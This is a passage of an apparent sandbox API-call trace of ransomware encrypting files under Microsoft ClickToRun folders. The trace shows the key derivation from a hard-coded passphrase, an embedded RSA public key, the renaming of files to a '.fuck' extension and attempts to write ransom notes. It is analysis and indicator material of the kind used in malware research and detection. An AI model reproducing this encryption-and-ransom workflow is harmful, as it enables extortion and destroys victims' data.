dwFileAttributes=0x2) returned 0 [0234.591] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2792dd0) returned 1 [0234.601] CryptCreateHash (in: hProv=0x2792dd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.601] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.601] CryptHashData (hHash=0x27173a8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.601] CryptDeriveKey (in: hProv=0x2792dd0, Algid=0x6610, hBaseData=0x27173a8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2717468) returned 1 [0234.601] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.601] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.601] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2792e58) returned 1 [0234.604] CryptImportPublicKeyInfo (in: hCryptProv=0x2792e58, dwCertEncodingType=0x1, pInfo=0x2797178*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27971a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27971b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27174e8) returned 1 [0234.604] CryptEncrypt (in: hKey=0x27174e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.604] CryptEncrypt (in: hKey=0x27174e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792ee0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792ee0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.604] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792ee0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.604] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.604] CryptEncrypt (in: hKey=0x2717468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.604] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.604] CloseHandle (hObject=0xffffffff) returned 1 [0234.604] CloseHandle (hObject=0xffffffff) returned 1 [0234.604] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0234.605] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0234.605] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0234.605] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0234.606] CryptDestroyHash (hHash=0x27173a8) returned 1 [0234.606] CryptDestroyKey (hKey=0x2717468) returned 1 [0234.606] CryptReleaseContext (hProv=0x2792dd0, dwFlags=0x0) returned 1 [0234.606] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.606] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.606] GetLastError () returned 0x5 [0234.606] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash")) returned 0x20 [0234.606] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0234.606] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.607] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.607] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0234.607] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x27935c8) returned 1 [0234.617] CryptCreateHash (in: hProv=0x27935c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.617] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.617] CryptHashData (hHash=0x27173a8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.617] CryptDeriveKey (in: hProv=0x27935c8, Algid=0x6610, hBaseData=0x27173a8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27176e8) returned 1 [0234.617] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.617] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.617] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2792dd0) returned 1 [0234.637] CryptImportPublicKeyInfo (in: hCryptProv=0x2792dd0, dwCertEncodingType=0x1, pInfo=0x2796c98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796cc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796cd0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2717328) returned 1 [0234.637] CryptEncrypt (in: hKey=0x2717328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.637] CryptEncrypt (in: hKey=0x2717328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792f68*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2792f68*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.638] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792f68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.638] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.638] CryptEncrypt (in: hKey=0x27176e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.638] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.638] CloseHandle (hObject=0xffffffff) returned 1 [0234.638] CloseHandle (hObject=0xffffffff) returned 1 [0234.638] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0234.638] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0234.639] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.gsg")) returned 0 [0234.639] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\s640.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\s640.hash.fuck")) returned 0 [0234.639] CryptDestroyHash (hHash=0x27173a8) returned 1 [0234.639] CryptDestroyKey (hKey=0x27176e8) returned 1 [0234.639] CryptReleaseContext (hProv=0x27935c8, dwFlags=0x0) returned 1 [0234.639] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.640] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.640] GetLastError () returned 0x5 [0234.640] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat")) returned 0x20 [0234.640] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x80) returned 0 [0234.640] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.640] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.641] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0234.641] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2793188) returned 1 [0234.651] CryptCreateHash (in: hProv=0x2793188, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0234.651] lstrlenA (lpString="kRqkZAFpllEfdydHCwFycviMzMlQm") returned 29 [0234.651] CryptHashData (hHash=0x2717468, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0234.651] CryptDeriveKey (in: hProv=0x2793188, Algid=0x6610, hBaseData=0x2717468, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2717528) returned 1 [0234.651] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0234.651] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0234.651] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2792000) returned 1 [0234.654] CryptImportPublicKeyInfo (in: hCryptProv=0x2792000, dwCertEncodingType=0x1, pInfo=0x2797728*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797758*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797760*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2717568) returned 1 [0234.654] CryptEncrypt (in: hKey=0x2717568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0234.654] CryptEncrypt (in: hKey=0x2717568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2791c48*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2791c48*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0234.654] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2791c48, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.654] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279eba8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0234.654] CryptEncrypt (in: hKey=0x2717528, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279eba8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0234.654] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279eba8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0234.654] CloseHandle (hObject=0xffffffff) returned 1 [0234.654] CloseHandle (hObject=0xffffffff) returned 1 [0234.654] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat"), bFailIfExists=0) returned 0 [0234.655] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat", dwFileAttributes=0x0) returned 0 [0234.655] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.gsg")) returned 0 [0234.655] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\stream.x64.x-none.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\stream.x64.x-none.man.dat.fuck")) returned 0 [0234.656] CryptDestroyHash (hHash=0x2717468) returned 1 [0234.656] CryptDestroyKey (hKey=0x2717528) returned 1 [0234.656] CryptReleaseContext (hProv=0x2793188, dwFlags=0x0) returned 1 [0234.656] FindNextFileA (in: hFindFile=0x27174a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0234.656] FindClose (in: hFindFile=0x27174a8 | out: hFindFile=0x27174a8) returned 1 [0234.656] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\readme_back_files.htm")) returned 0xffffffff [0234.656] AreFileApisANSI () returned 1 [0234.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0234.656] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.657] GetLastError () returned 0x5 [0234.657] GetLastError () returned 0x5 [0234.657] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0234.657] FindClose (in: hFindFile=0x27175e8 | out: hFindFile=0x27175e8) returned 1 [0234.657] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\readme_back_files.htm")) returned 0xffffffff [0234.657] AreFileApisANSI () returned 1 [0234.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x39da88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0234.657] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.657] GetLastError () returned 0x5 [0234.658] GetLastError () returned 0x5 [0234.658] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0234.658] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27175e8 [0234.659] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.659] FindNextFileA (in: hFindFile=0x27175e8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0234.659] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27173a8 [0234.677] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.677] FindNextFileA (in: hFindFile=0x27173a8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0234.677] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0234.677] GetLastError () returned 0x5 [0234.677] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml")) returned 0x20 [0234.678] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml", dwFileAttributes=0x80) returned 0 [0234.678] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.679] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\9D76938C-943D-439F-A135-26D02821EE05\\en-us.16\\MasterDescriptor.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\9d76938c-943d-439f-a135-26d02821ee05\\en-us.16\\masterdescriptor.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.679] SetFileAttributesA 